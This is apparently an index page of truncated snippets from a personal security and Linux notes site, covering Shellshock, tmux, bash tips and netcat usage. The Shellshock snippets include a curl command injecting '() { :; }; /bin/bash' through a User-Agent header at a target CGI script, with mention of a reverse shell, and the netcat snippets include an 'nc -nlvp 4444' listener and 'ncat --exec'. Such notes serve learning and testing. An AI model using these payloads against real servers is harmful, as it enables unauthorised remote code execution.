-
Older bash versions may execute code after function definitions. Via command line Source with explanation export newfunction='() { echo 'shellshockdemo';}; echo vulnerable' Via a web server / CGI script Caution: Try the reverse shell example in Burp also if the curl command fails! curl http://$target/cgi-bin/admin.cgi -s > before curl -H "User-Agent: () { :; }; /bin/bash…
-
Shellshock A function in a environment variable is executed in a child process of the bash. When exporting a new function like this export func=’() { echo mist; }; echo aha;’ and starting a new bash session, “aha” is executed.
-
Create a session tmux new -s <name>
-
Use dash, which doesn’t drop privileges. Arguments ls Order by the last recent modified file: ls -t Better history Add this to .bashrc HISTSIZE=10000 HISTTIMEFORMAT='%F %T ' Handling from files with starting - cp -- -file.txt file.txt STDOUT, STDIN and STDERR (redirection) Output STDERR (2) also on STDOUT (1) cmd 2>&1 man Seaching for a keyword in…
-
Namenskonfusion Datei ausliefern: echo -e "HTTP/1.1 200 OK\nContent-Length: 5\n\nHallo" | nc -l localhost 8000 Datei anfragen über SSL: echo -e "GET / HTTP/1.1\nHost: localhost\n\n" | ncat -C --ssl localhost 443 Gebe Ausgabe von Programm zurück: ncat -l localhost 3000 --exec /bin/date Datei direkt übertragen (unverschlüsselt!): 1. Empfänger: user@host02:~$ ncat -l > aha oder nc -nlvp 4444…